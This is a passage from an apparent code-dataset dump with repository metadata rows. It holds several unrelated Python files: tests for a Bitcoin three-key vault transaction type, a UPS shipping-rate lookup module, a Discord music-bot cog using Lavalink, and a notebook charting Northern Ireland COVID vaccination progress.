        self.assertEqual(tx.tx_type, TxType.ALERT_PENDING)
        with self.assertRaises(ValueError) as err:
            ThreeKeysTransaction(None, 'unknown type')
        self.assertTrue('tx_type has to be TxType' in str(err.exception))
    def test_creating_3key_tx_from_transaction(self):
        tx = Transaction(TX)
        # assert correct serialization
        self.assertEqual(TX, tx.serialize())
        # wrong type passed
        class WrongTxType: pass
        with self.assertRaises(ValueError) as err:
            ThreeKeysTransaction.from_tx(WrongTxType())
        self.assertEqual('Wrong transaction type WrongTxType', str(err.exception))
        # converting preserves bytes, defaults to NONVAULT, stays a Transaction
        three_key_tx = ThreeKeysTransaction.from_tx(tx)
        self.assertEqual(TX, three_key_tx.serialize())
        self.assertEqual(TxType.NONVAULT, three_key_tx.tx_type)
        self.assertTrue(isinstance(three_key_tx, Transaction))
class TestTxType(TestCase):
    """Round-trip, error-message and identity tests for TxType.from_str."""

    def setUp(self):
        # (name, member) pairs covering every TxType value.
        self.inputs = [(member.name, member) for member in TxType]

    def test_creating_from_string(self):
        for name, expected in self.inputs:
            with self.subTest((name, expected)):
                self.assertEqual(expected, TxType.from_str(name))

    def test_creating_error(self):
        bad_name = 'wrong key'
        with self.assertRaises(ValueError) as err:
            TxType.from_str(bad_name)
        self.assertEqual(f"Cannot get TxType for '{bad_name}'",
                         str(err.exception))

    def test_identity(self):
        original = TxType.INSTANT
        round_tripped = TxType.from_str(str(original.value))
        self.assertEqual(original, round_tripped)
| 2,232 | 47 | 337 |
483a6d2c7223c8cfe9fb9a0e0968b1ec56d31e1b | 2,745 | py | Python | sirius/matrices.py | natebunnyfield/sirius | b57863e9d5f241ee8a3c7c2b43bf0da5b85d486c | [
"BSD-3-Clause"
] | 1 | 2019-10-01T17:15:24.000Z | 2019-10-01T17:15:24.000Z | sirius/matrices.py | natebunnyfield/sirius | b57863e9d5f241ee8a3c7c2b43bf0da5b85d486c | [
"BSD-3-Clause"
] | null | null | null | sirius/matrices.py | natebunnyfield/sirius | b57863e9d5f241ee8a3c7c2b43bf0da5b85d486c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from math import ceil
import os
import yaml
CONFIG_DIR = os.path.abspath(os.path.join(__file__, '..', 'shipping_configs'))
# ups ground
UPS_GROUND_ZIP_TO_ZONE = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_ground_zip_to_zone.yaml'), 'r'))
UPS_GROUND_ZONE_WEIGHT_PRICE = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_ground_zone_weight_price.yaml'), 'r'))
UPS_GROUND_ZONE_44 = [str(line.rstrip()) for line in open(os.path.join(CONFIG_DIR, 'zone44.txt'))]
UPS_GROUND_ZONE_46 = [str(line.rstrip()) for line in open(os.path.join(CONFIG_DIR, 'zone46.txt'))]
# ups mail innovations
UPS_MI_RATES_OZ = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_mi_rates_oz.yaml')))
UPS_MI_RATES_LBS = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_mi_rates_lbs.yaml')))
def get_cheapest_option(zipcode, weight):
    """
    gets the cheapest price for a box

    :param zipcode: destination zip code (str or int)
    :param weight: package weight in ounces
    :return: (carrier name, price) tuple for the cheapest option
    """
    # weights come in ounces - if it's less than a pound - send it via mail innovations
    if weight <= 16:
        for tier in sorted(UPS_MI_RATES_OZ):
            if ceil(weight) <= tier:
                return 'UPS Mail Innovations', UPS_MI_RATES_OZ[tier]
    # over a pound? that gets tricky. convert to pounds
    weight = ceil(float(weight) / 16)
    # check if the zipcode is in the 44/46 lists (hawaii or alaska)
    zipcode = str(zipcode)
    if zipcode in UPS_GROUND_ZONE_44:
        zone = '044'
    elif zipcode in UPS_GROUND_ZONE_46:
        zone = '046'
    else:  # it's in the lower 48
        zipcode = str(zipcode)[:3]  # ups only uses the first three digits
        zone = UPS_GROUND_ZIP_TO_ZONE[zipcode]
    # check weights
    options = []  # ups mail innovations
    for tier in sorted(UPS_MI_RATES_LBS):
        if weight <= tier:
            options.append(('UPS Mail Innovations', UPS_MI_RATES_LBS[tier]))
            break
    # ups ground
    for tier in sorted(UPS_GROUND_ZONE_WEIGHT_PRICE[zone]):
        if weight <= tier:
            options.append(('UPS Ground', UPS_GROUND_ZONE_WEIGHT_PRICE[zone][tier]))
            break
    # get cheapest option
    # NOTE(review): raises ValueError (min of empty sequence) when the
    # weight exceeds every tier in both rate tables.
    return min(options, key=lambda x: x[1])
def get_irregular_price(zipcode, weight):
    """
    does much of the same as `get_cheapest_option`, but skips all MI

    :param zipcode: destination zip code (str or int)
    :param weight: package weight in ounces
    :return: the UPS Ground price, or implicitly None when the weight
        exceeds every tier for the zone
    """
    weight = ceil(float(weight) / 16)
    zipcode = str(zipcode)
    if zipcode in UPS_GROUND_ZONE_44:
        zone = '044'
    elif zipcode in UPS_GROUND_ZONE_46:
        zone = '046'
    else:  # it's in the lower 48
        zipcode = str(zipcode)[:3]  # ups only uses the first three digits
        zone = UPS_GROUND_ZIP_TO_ZONE[zipcode]
    for tier in sorted(UPS_GROUND_ZONE_WEIGHT_PRICE[zone]):
        if weight <= tier:
            return UPS_GROUND_ZONE_WEIGHT_PRICE[zone][tier]
| 35.192308 | 114 | 0.668488 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from math import ceil
import os
import yaml
CONFIG_DIR = os.path.abspath(os.path.join(__file__, '..', 'shipping_configs'))
# ups ground
UPS_GROUND_ZIP_TO_ZONE = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_ground_zip_to_zone.yaml'), 'r'))
UPS_GROUND_ZONE_WEIGHT_PRICE = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_ground_zone_weight_price.yaml'), 'r'))
UPS_GROUND_ZONE_44 = [str(line.rstrip()) for line in open(os.path.join(CONFIG_DIR, 'zone44.txt'))]
UPS_GROUND_ZONE_46 = [str(line.rstrip()) for line in open(os.path.join(CONFIG_DIR, 'zone46.txt'))]
# ups mail innovations
UPS_MI_RATES_OZ = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_mi_rates_oz.yaml')))
UPS_MI_RATES_LBS = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_mi_rates_lbs.yaml')))
def get_cheapest_option(zipcode, weight):
    """
    gets the cheapest price for a box

    :param zipcode: destination zip code (str or int)
    :param weight: package weight in ounces
    :return: (carrier name, price) tuple for the cheapest option
    :raises ValueError: when the weight exceeds every rate tier
    """
    # weights come in ounces - if it's less than a pound - send it via mail innovations
    if weight <= 16:
        for tier in sorted(UPS_MI_RATES_OZ):
            if ceil(weight) <= tier:
                return 'UPS Mail Innovations', UPS_MI_RATES_OZ[tier]
    # over a pound? that gets tricky. convert to pounds
    weight = ceil(float(weight) / 16)
    # check if the zipcode is in the 44/46 lists (hawaii or alaska)
    zipcode = str(zipcode)
    if zipcode in UPS_GROUND_ZONE_44:
        zone = '044'
    elif zipcode in UPS_GROUND_ZONE_46:
        zone = '046'
    else:  # it's in the lower 48
        # ups only uses the first three digits
        zone = UPS_GROUND_ZIP_TO_ZONE[zipcode[:3]]
    # collect a candidate price from each carrier's pound-rate table
    options = []
    # ups mail innovations
    for tier in sorted(UPS_MI_RATES_LBS):
        if weight <= tier:
            options.append(('UPS Mail Innovations', UPS_MI_RATES_LBS[tier]))
            break
    # ups ground
    for tier in sorted(UPS_GROUND_ZONE_WEIGHT_PRICE[zone]):
        if weight <= tier:
            options.append(('UPS Ground', UPS_GROUND_ZONE_WEIGHT_PRICE[zone][tier]))
            break
    if not options:
        # FIX: previously min() crashed with a cryptic
        # "min() arg is an empty sequence" ValueError.
        raise ValueError(
            "no shipping rate covers %s lbs to zip %s" % (weight, zipcode))
    # get cheapest option
    return min(options, key=lambda x: x[1])
def get_irregular_price(zipcode, weight):
    """
    does much of the same as `get_cheapest_option`, but skips all MI
    """
    pounds = ceil(float(weight) / 16)
    zip_str = str(zipcode)
    # hawaii / alaska get their own zones; everything else keys off the
    # first three digits of the zip code
    if zip_str in UPS_GROUND_ZONE_44:
        zone = '044'
    elif zip_str in UPS_GROUND_ZONE_46:
        zone = '046'
    else:
        zone = UPS_GROUND_ZIP_TO_ZONE[zip_str[:3]]
    rate_table = UPS_GROUND_ZONE_WEIGHT_PRICE[zone]
    for tier in sorted(rate_table):
        if pounds <= tier:
            return rate_table[tier]
    # falls through (returns None) when the weight exceeds every tier
| 0 | 0 | 0 |
0b23c6c86af91d41e4d8bda165dad1aab59afd10 | 16,743 | py | Python | music.py | edvinassaikevicius/Discord_Music_Bot | 931f64c76d3164626ddee27ef00bfef443ca27a6 | [
"MIT"
] | null | null | null | music.py | edvinassaikevicius/Discord_Music_Bot | 931f64c76d3164626ddee27ef00bfef443ca27a6 | [
"MIT"
] | null | null | null | music.py | edvinassaikevicius/Discord_Music_Bot | 931f64c76d3164626ddee27ef00bfef443ca27a6 | [
"MIT"
] | null | null | null | import re
import random
import discord
import lavalink
from discord.ext import commands
import asyncio
import fileRead
url_rx = re.compile(r'https?://(?:www\.)?.+')
"""
Robert A. USF Computer Science
A cog to hold all of the functions used to play music for the bot.
""" | 49.979104 | 217 | 0.61351 | import re
import random
import discord
import lavalink
from discord.ext import commands
import asyncio
import fileRead
url_rx = re.compile(r'https?://(?:www\.)?.+')
"""
Robert A. USF Computer Science
A cog to hold all of the functions used to play music for the bot.
"""
class music(commands.Cog):
    def __init__(self, bot):
        """Attach a lavalink client to *bot* (once) and register the event hook."""
        self.bot = bot
        if not hasattr(bot, 'lavalink'):  # This ensures the client isn't overwritten during cog reloads.
            bot.lavalink = lavalink.Client(bot.user.id)
            bot.lavalink.add_node('127.0.0.1', 2333, 'changeme123', 'na', 'local_music_node')  # PASSWORD HERE MUST MATCH YML
            bot.add_listener(bot.lavalink.voice_update_handler, 'on_socket_response')
        lavalink.add_event_hook(self.track_hook)
    def cog_unload(self):
        """ Cog unload handler. This removes any event hooks that were registered. """
        # Clearing the hooks prevents duplicate handlers after a cog reload.
        self.bot.lavalink._event_hooks.clear()
async def cog_before_invoke(self, ctx):
""" Command before-invoke handler. """
guild_check = ctx.guild is not None
# This is essentially the same as `@commands.guild_only()`
# except it saves us repeating ourselves (and also a few lines).
if guild_check:
await self.ensure_voice(ctx)
# Ensure that the bot and command author share a mutual voicechannel.
return guild_check
    async def cog_command_error(self, ctx, error):
        """Surface errors raised inside this cog's commands to the channel."""
        if isinstance(error, commands.CommandInvokeError):
            await ctx.send(error.original)
        # The above handles errors thrown in this cog and shows them to the user.
    async def ensure_voice(self, ctx):
        """ This check ensures that the bot and command author are in the same voicechannel. """
        player = self.bot.lavalink.player_manager.create(ctx.guild.id, endpoint=str(ctx.guild.region))
        # Only 'play' / 'playfromlist' may cause the bot to join a channel.
        should_connect = ctx.command.name in ('play','playfromlist')
        if not ctx.author.voice or not ctx.author.voice.channel:
            # Our cog_command_error handler catches this and sends it to the voicechannel.
            # Exceptions allow us to "short-circuit" command invocation via checks so the
            # execution state of the command goes no further.
            raise commands.CommandInvokeError('Join a voicechannel first.')
        if not player.is_connected:
            if not should_connect:
                raise commands.CommandInvokeError('Not connected.')
            permissions = ctx.author.voice.channel.permissions_for(ctx.me)
            if not permissions.connect or not permissions.speak:
                raise commands.CommandInvokeError('I need the `CONNECT` and `SPEAK` permissions.')
            player.store('channel', ctx.channel.id)
            await ctx.guild.change_voice_state(channel=ctx.author.voice.channel)
        else:
            # Already connected somewhere: the author must be in that channel.
            if int(player.channel_id) != ctx.author.voice.channel.id:
                raise commands.CommandInvokeError('You need to be in my voicechannel.')
async def track_hook(self, event):
if isinstance(event, lavalink.events.QueueEndEvent):
# When this track_hook receives a "QueueEndEvent" from lavalink.py
# it indicates that there are no tracks left in the player's queue.
# To save on resources, we can tell the bot to disconnect from the voicechannel.
guild_id = int(event.player.guild_id)
guild = self.bot.get_guild(guild_id)
await guild.change_voice_state(channel=None)
    @commands.command(name = 'play', description=".play {song name} to play a song, will connect the bot.") # Allows for a song to be played, does not make sure people are in the same chat.
    @commands.has_any_role('Dj','Administrator','DJ')
    async def play_song(self, ctx, *, query):
        """ Searches and plays a song from a given query. """
        # Get the player for this guild from cache.
        player = self.bot.lavalink.player_manager.get(ctx.guild.id)
        query = query.strip('<>')
        # Check if the user input might be a URL. If it isn't, we can have Lavalink do a YouTube search for it instead.
        if not url_rx.match(query):
            query = f'ytsearch:{query}'
        # Get the results for the query from Lavalink.
        results = await player.node.get_tracks(query)
        # Results could be None if Lavalink returns an invalid response (non-JSON/non-200 (OK)).
        # Alternatively, results['tracks'] could be an empty array if the query yielded no tracks.
        if not results or not results['tracks']:
            return await ctx.send('Nothing found!')
        embed = discord.Embed(color=discord.Color.blurple())
        # Valid loadTypes are:
        #   TRACK_LOADED    - single video/direct URL)
        #   PLAYLIST_LOADED - direct URL to playlist)
        #   SEARCH_RESULT   - query prefixed with either ytsearch: or scsearch:.
        #   NO_MATCHES      - query yielded no results
        #   LOAD_FAILED     - most likely, the video encountered an exception during loading.
        if results['loadType'] == 'PLAYLIST_LOADED':
            tracks = results['tracks']
            for track in tracks:
                # Add all of the tracks from the playlist to the queue.
                player.add(requester=ctx.author.id, track=track)
            embed.title = 'Playlist Enqueued!'
            embed.description = f'{results["playlistInfo"]["name"]} - {len(tracks)} tracks'
        else:
            track = results['tracks'][0]
            embed.title = 'Track Enqueued'
            embed.description = f'[{track["info"]["title"]}]({track["info"]["uri"]})'
            track = lavalink.models.AudioTrack(track, ctx.author.id, recommended=True)
            player.add(requester=ctx.author.id, track=track)
        await ctx.send(embed=embed)
        # Start playback only if nothing is already playing.
        if not player.is_playing:
            await player.play()
    @commands.command(name="playfromlist",aliases = ["pfpl","playl"],description="Loads a playlist into the queue to be played.")
    @commands.has_any_role("Dj","DJ","Administrator")
    async def play_from_list(self,ctx,*,playlist_name):
        """ Loads a saved playlist into the queue and starts playback. """
        # Get the player for this guild from cache.
        songlist = fileRead.play_playlist(ctx,playlist_name)
        if songlist == False:
            return await ctx.channel.send("Playlist not found.")
        player = self.bot.lavalink.player_manager.get(ctx.guild.id)
        # This is to play a song up front so you dont have to wait for whole queue to hear music
        query = songlist[0]
        songlist.pop(0)
        query = f'ytsearch:{query}'
        results = await player.node.get_tracks(query)
        track = results['tracks'][0]
        track = lavalink.models.AudioTrack(track, ctx.author.id, recommended=True)
        player.add(requester=ctx.author.id, track=track)
        if not player.is_playing:
            await player.play()
        for track in songlist: # Add all remaining songs to list.
            try:
                query = f'ytsearch:{track}'
                results = await player.node.get_tracks(query)
                track = results['tracks'][0]
                track = lavalink.models.AudioTrack(track, ctx.author.id, recommended=True)
                player.add(requester=ctx.author.id, track=track)
            except Exception as error: # Catches song not found; skip it and keep loading.
                print(error)
        await ctx.send("Playlist loaded successfully.")
        if not player.is_playing:
            await player.play()
@commands.command(name = 'skip',description="Skips currently playing song.") #skips currently playing song
@commands.has_any_role('Dj','Administrator','DJ')
async def skip_song(self, ctx,amount = 1):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
x = 0
while (x < amount):
x = x + 1
if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
if not player.is_playing:
return await ctx.channel.send("Nothing playing to skip.")
else:
await player.skip()
if x == 1: # make sure song skipped only prints once.
await ctx.channel.send("Song skipped.")
else:
return await ctx.channel.send("Please join the same voice channel as me.")
except:
return await ctx.channel.send("Nothing playing.")
@commands.command(name = "clear",description="Clears all of the currently playing songs and makes the bot disconnect.")
@commands.has_any_role("Dj","DJ","Administrator")
async def clear_queue(self,ctx):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
if player.is_playing:
while player.is_playing:
await player.skip()
await ctx.channel.send("Songs Cleared.")
else:
await ctx.channel.send("Nothing playing to clear.")
else:
await ctx.channel.send("Please join the same voice channel as me.")
except:
await ctx.channel.send("Nothing playing.")
# may remove this as it is depricated by clear, a safer alternative.
@commands.command(name = 'disconnect', aliases = ['dc'],description="Force disconnects the bot from a voice channel") #bad practice, better to use clear.
@commands.has_any_role('Dj','Administrator','DJ')
async def disconnect_bot(self,ctx):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
if not player.is_connected:
await ctx.channel.send("No bot is connected.")
else:
await ctx.channel.send("Bot disconnected.")
guild_id = int(player.guild_id)
await self.connect_to(guild_id,None)
else:
await ctx.channel.send("Please join the same voice channel as me.")
except:
await ctx.channel.send("Nothing playing.")
@commands.command(name='pause',aliases=["ps"],description="Pauses a song if one is playing.") #command to pause currently playing music
@commands.has_any_role('Dj','Administrator','DJ')
async def pause_bot(self,ctx):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
if player.is_playing:
status = True
await ctx.channel.send("Song has been paused.")
await player.set_pause(True)
i = 0
while i < 84: # This will periodically check to see if it has been unpaused
await asyncio.sleep(5)
i = i + 1
if not player.paused: # If its been unpaused no need to keep counting. (Also fixes some issues)
status = False
break
if player.paused and player.is_playing and status is True:
await player.set_pause(False) # If paused unpause.
await ctx.channel.send("Automatically unpaused.")
else:
await ctx.channel.send("No song is playing to be paused.")
else:
await ctx.channel.send("Please join the same voice channel as me.")
except:
await ctx.channel.send("Nothing playing.")
@commands.command(name='unpause', aliases=['resume','start','up'],description="Unpauses a paused song.") #command to unpause currently paused music
@commands.has_any_role('Dj','Administrator','DJ')
async def unpause_bot(self,ctx):
    """Resume a paused track for users sharing the bot's voice channel."""
    try:
        player = self.bot.lavalink.player_manager.get(ctx.guild.id)
        in_same_channel = ctx.author.voice.channel.id == int(player.channel_id)
        if not in_same_channel:
            await ctx.channel.send("Please join the same voice channel as me.")
        elif player.paused:
            await ctx.channel.send("Resuming song.")
            await player.set_pause(False)
        else:
            await ctx.channel.send("Nothing is paused to resume.")
    except:
        # Reached when no player exists for this guild or the author
        # is not connected to voice chat at all.
        await ctx.channel.send("Nothing playing.")
@commands.command(name='queue',aliases=['playlist','songlist','upnext'],description="Shows songs up next in order, with the currently playing at the top.") # display the songs in the order they are waiting to play
@commands.has_any_role('Dj','Administrator','DJ')
async def queue(self,ctx, page = 1):
    """Show the play queue, 10 titles per page, with the current track on top.

    Out-of-range page numbers are clamped to the first/last page, matching
    the original branch-per-case behaviour.
    """
    if not isinstance(page, int): # Stop here if the page is not a valid number (save processing time).
        # BUG FIX: `send` returns a coroutine; without `await` the error
        # message was never delivered (asyncio warns "coroutine was never
        # awaited") and the command silently did nothing.
        return await ctx.channel.send("Please enter a valid number.")
    player = self.bot.lavalink.player_manager.get(ctx.guild.id)
    if player.is_playing:
        songlist = player.queue
        list_collection = []
        complete_list = "NP: " + player.current['title'] + "\n"
        i = 0  # stays 0 when the queue is empty (enumerate never assigns)
        for i, song in enumerate(songlist, start=1):
            complete_list += f"{i}: {song['title']}\n"
            if i % 10 == 0: # Break into pages of 10 and add to a collection
                list_collection.append(complete_list)
                complete_list = ''
        if i % 10 != 0 or i == 0: # Flush the partial page, or the header alone when only one song is playing
            list_collection.append(complete_list)
        # Clamp the 1-based page into [1, page count]; this reproduces the
        # original three branches (negative -> first, too large -> last).
        selection = min(max(page, 1), len(list_collection)) - 1
        embed = discord.Embed()
        list_collection[selection] += "Page: " + str(selection + 1) + "/" + str(len(list_collection))
        embed.description = list_collection[selection]
        await ctx.channel.send(embed=embed)
    else:
        await ctx.channel.send("Nothing is queued.")
# This needs to be tested more thoroughly. Broke my bot again.
@commands.command(name = "shuffle",description = "New shuffle function that has to be called once and makes a new queue. Result is shown on \"queue\" commands now..")
@commands.has_any_role("Dj","DJ","Administrator")
async def shuffle(self,ctx):
    """Shuffle the pending queue in place (one-shot, not a toggle)."""
    try:
        player = self.bot.lavalink.player_manager.get(ctx.guild.id)
        if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
            if player.is_playing:
                songlist = player.queue
                # In-place shuffle: player.queue itself is reordered.
                random.shuffle(songlist)
                await ctx.channel.send("Finished.")
            else:
                await ctx.channel.send("Nothing playing!")
        else:
            await ctx.channel.send("Please join the same voice channel as me and ensure something is playing.")
    except Exception as error:
        # Errors are only printed to stdout; the invoking user gets no reply here.
        print(error)
@commands.command(name = 'clearbotcache', description="Used to clear the bot cache, only use after reading the Readme file. This can have negative consequences and should be avoided.")
@commands.has_permissions(ban_members=True, kick_members=True, manage_roles=True, administrator=True)
async def disconnect_player(self, ctx):
    """Destroy this guild's Lavalink player to reset any stuck state.

    `create` is called before `destroy` — presumably so `destroy` always has
    a player to remove; confirm against the lavalink.py player_manager API.
    NOTE(review): `ctx.guild.region` was removed in discord.py 2.0 — verify
    the pinned library version before relying on this command.
    """
    player = self.bot.lavalink.player_manager.create(ctx.guild.id, endpoint=str(ctx.guild.region))
    await self.bot.lavalink.player_manager.destroy(int(ctx.guild.id))
    await ctx.channel.send("Bot player has been cleared successfully.")
def setup(bot):
bot.add_cog(music(bot)) | 8,180 | 8,239 | 54 |
579cdee2a6b24c2118b16d29b2ea7f8695a96d6a | 4,766 | py | Python | notebooks/vacc_booster_gap.py | pbarber/ni-covid-tweets | fd108d8d570aafe4dca6741066af8c2ef92e6b03 | [
"MIT"
] | 1 | 2021-12-13T23:08:45.000Z | 2021-12-13T23:08:45.000Z | notebooks/vacc_booster_gap.py | aarong1/ni-covid-tweets | cbe1e2bc4333b31cdf4e281ed04fc77743938faa | [
"MIT"
] | 18 | 2021-03-30T19:45:37.000Z | 2022-02-02T18:36:17.000Z | notebooks/vacc_booster_gap.py | aarong1/ni-covid-tweets | cbe1e2bc4333b31cdf4e281ed04fc77743938faa | [
"MIT"
] | 1 | 2021-12-13T23:08:32.000Z | 2021-12-13T23:08:32.000Z | # %%
import datetime
import pandas
import altair
from plot_shared import plot_points_average_and_trend
# %%
# Daily cumulative first/second-dose totals per UK nation from the PHE
# coronavirus dashboard API.
df = pandas.read_csv('https://api.coronavirus.data.gov.uk/v2/data?areaType=nation&metric=cumPeopleVaccinatedFirstDoseByPublishDate&metric=cumPeopleVaccinatedSecondDoseByPublishDate&format=csv')
df.rename(columns={
    'cumPeopleVaccinatedFirstDoseByPublishDate': 'First',
    'cumPeopleVaccinatedSecondDoseByPublishDate': 'Second',
    'areaName': 'Nation',
    'date': 'Publication Date'
}, inplace=True)
# Long format: one row per (publication date, nation, dose) with the cumulative count.
df = df.drop(columns=['areaCode','areaType']).melt(id_vars=['Publication Date','Nation'], var_name='Dose', value_name='People')
# %%
# Doses scraped from the NI dashboard; normalise dose labels to the PHE naming.
ni = pandas.read_csv('../sam/doses.csv')
ni['Dose'] = ni['Dose'].str.replace('Dose 1', 'First')
ni['Dose'] = ni['Dose'].str.replace('Dose 2', 'Second')
ni['Dose'] = ni['Dose'].str.replace('Dose 3', 'Third')
# %%
history = df[df['Nation']=='Northern Ireland'][['Publication Date','Dose','People']]
ni.rename(columns={'Date':'Publication Date','Total':'People'}, inplace=True)
# Outer-merge the two sources; prefer the PHE figure where both exist and
# fall back to the bot-scraped NI figure otherwise.
# NOTE(review): `all` shadows the builtin of the same name.
all = history.merge(ni, on=['Publication Date','Dose'], how='outer', suffixes=('','_bot'))
all['People'] = all['People'].fillna(all['People_bot'])
all = all[['Publication Date','Dose','People']]
# %%
# For each booster total on date D, look up the second-dose total 6/7/8
# months earlier, so the chart shows how far boosters lag second doses.
boosters = all[all['Dose']=='Booster'][['Publication Date','People']]
boosters['Publication Date'] = pandas.to_datetime(boosters['Publication Date'])
dose2s = all[all['Dose']=='Second'][['Publication Date','People']]
dose2s['Publication Date'] = pandas.to_datetime(dose2s['Publication Date'])
# Offsets approximate calendar months: 183 days ~ 6 months, +31/+62 days for 7/8.
dose2s['Booster Target Date 6M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183, unit='d')
dose2s['Booster Target Date 7M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183+31, unit='d')
dose2s['Booster Target Date 8M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183+62, unit='d')
# One left-merge per lag; after each merge keep only the wanted columns and
# rename the joined second-dose column to its display name.
boosters = boosters.merge(dose2s[['Booster Target Date 6M','People']], left_on='Publication Date', right_on='Booster Target Date 6M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','People','People_target']]
boosters.rename(columns={'People':'Booster doses', 'People_target': 'Second doses 6 months earlier'}, inplace=True)
boosters = boosters.merge(dose2s[['Booster Target Date 7M','People']], left_on='Publication Date', right_on='Booster Target Date 7M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','Booster doses','Second doses 6 months earlier','People']]
boosters.rename(columns={'People': 'Second doses 7 months earlier'}, inplace=True)
boosters = boosters.merge(dose2s[['Booster Target Date 8M','People']], left_on='Publication Date', right_on='Booster Target Date 8M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','Booster doses','Second doses 6 months earlier','Second doses 7 months earlier','People']]
boosters.rename(columns={'People': 'Second doses 8 months earlier'}, inplace=True)
# Long format for plotting: one row per (date, metric).
boosters = boosters.melt(id_vars='Publication Date', var_name='Metric', value_name='Doses')
# %%
# Chart 1: cumulative totals per dose over time.
plot_points_average_and_trend(
    [
        {
            'points': None,
            'line': all.set_index(['Publication Date','Dose'])['People'],
            'colour': 'Dose',
            'date_col': 'Publication Date',
            'x_title': 'Publication Date',
            'y_title': 'Total doses',
            'scales': ['linear'],
            'height': 450,
            'width': 800,
        },
    ],
    'NI COVID-19 vaccination progress up to %s' %(
        datetime.datetime.today().strftime('%A %-d %B %Y'),
    ),
    [
        'Dose 1/2 data from PHE dashboard/API, Dose 3/Booster collected from NI dashboard',
        'https://twitter.com/ni_covid19_data'
    ]
)
# %%
# Chart 2: boosters vs lagged second doses; saved as a dated PNG for tweeting.
p = plot_points_average_and_trend(
    [
        {
            'points': None,
            'line': boosters.set_index(['Publication Date','Metric'])['Doses'],
            'colour': 'Metric',
            'date_col': 'Publication Date',
            'x_title': 'Date',
            'y_title': 'Total doses',
            'scales': ['linear'],
            'height': 450,
            'width': 800,
            # 'colour_domain': ['Booster doses','Second doses 6 months earlier','Second doses 7 months earlier','Second doses 8 months earlier'],
            # 'colour_range': ['#ff0000','#2b7e9e','#52b4cf','#7eedff'],
        },
    ],
    'NI COVID-19 booster vaccination progress vs second dose up to %s' %(
        datetime.datetime.today().strftime('%A %-d %B %Y'),
    ),
    [
        'Dose 2 data from PHE dashboard/API, Booster data collected from NI dashboard',
        'https://twitter.com/ni_covid19_data'
    ]
)
p.save('ni-boosters-%s.png'%(datetime.datetime.now().date().strftime('%Y-%m-%d')))
p  # last expression so the chart renders in the notebook cell
# %%
| 46.72549 | 193 | 0.652749 | # %%
import datetime
import pandas
import altair
from plot_shared import plot_points_average_and_trend
# %%
df = pandas.read_csv('https://api.coronavirus.data.gov.uk/v2/data?areaType=nation&metric=cumPeopleVaccinatedFirstDoseByPublishDate&metric=cumPeopleVaccinatedSecondDoseByPublishDate&format=csv')
df.rename(columns={
'cumPeopleVaccinatedFirstDoseByPublishDate': 'First',
'cumPeopleVaccinatedSecondDoseByPublishDate': 'Second',
'areaName': 'Nation',
'date': 'Publication Date'
}, inplace=True)
df = df.drop(columns=['areaCode','areaType']).melt(id_vars=['Publication Date','Nation'], var_name='Dose', value_name='People')
# %%
ni = pandas.read_csv('../sam/doses.csv')
ni['Dose'] = ni['Dose'].str.replace('Dose 1', 'First')
ni['Dose'] = ni['Dose'].str.replace('Dose 2', 'Second')
ni['Dose'] = ni['Dose'].str.replace('Dose 3', 'Third')
# %%
history = df[df['Nation']=='Northern Ireland'][['Publication Date','Dose','People']]
ni.rename(columns={'Date':'Publication Date','Total':'People'}, inplace=True)
all = history.merge(ni, on=['Publication Date','Dose'], how='outer', suffixes=('','_bot'))
all['People'] = all['People'].fillna(all['People_bot'])
all = all[['Publication Date','Dose','People']]
# %%
boosters = all[all['Dose']=='Booster'][['Publication Date','People']]
boosters['Publication Date'] = pandas.to_datetime(boosters['Publication Date'])
dose2s = all[all['Dose']=='Second'][['Publication Date','People']]
dose2s['Publication Date'] = pandas.to_datetime(dose2s['Publication Date'])
dose2s['Booster Target Date 6M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183, unit='d')
dose2s['Booster Target Date 7M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183+31, unit='d')
dose2s['Booster Target Date 8M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183+62, unit='d')
boosters = boosters.merge(dose2s[['Booster Target Date 6M','People']], left_on='Publication Date', right_on='Booster Target Date 6M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','People','People_target']]
boosters.rename(columns={'People':'Booster doses', 'People_target': 'Second doses 6 months earlier'}, inplace=True)
boosters = boosters.merge(dose2s[['Booster Target Date 7M','People']], left_on='Publication Date', right_on='Booster Target Date 7M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','Booster doses','Second doses 6 months earlier','People']]
boosters.rename(columns={'People': 'Second doses 7 months earlier'}, inplace=True)
boosters = boosters.merge(dose2s[['Booster Target Date 8M','People']], left_on='Publication Date', right_on='Booster Target Date 8M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','Booster doses','Second doses 6 months earlier','Second doses 7 months earlier','People']]
boosters.rename(columns={'People': 'Second doses 8 months earlier'}, inplace=True)
boosters = boosters.melt(id_vars='Publication Date', var_name='Metric', value_name='Doses')
# %%
plot_points_average_and_trend(
[
{
'points': None,
'line': all.set_index(['Publication Date','Dose'])['People'],
'colour': 'Dose',
'date_col': 'Publication Date',
'x_title': 'Publication Date',
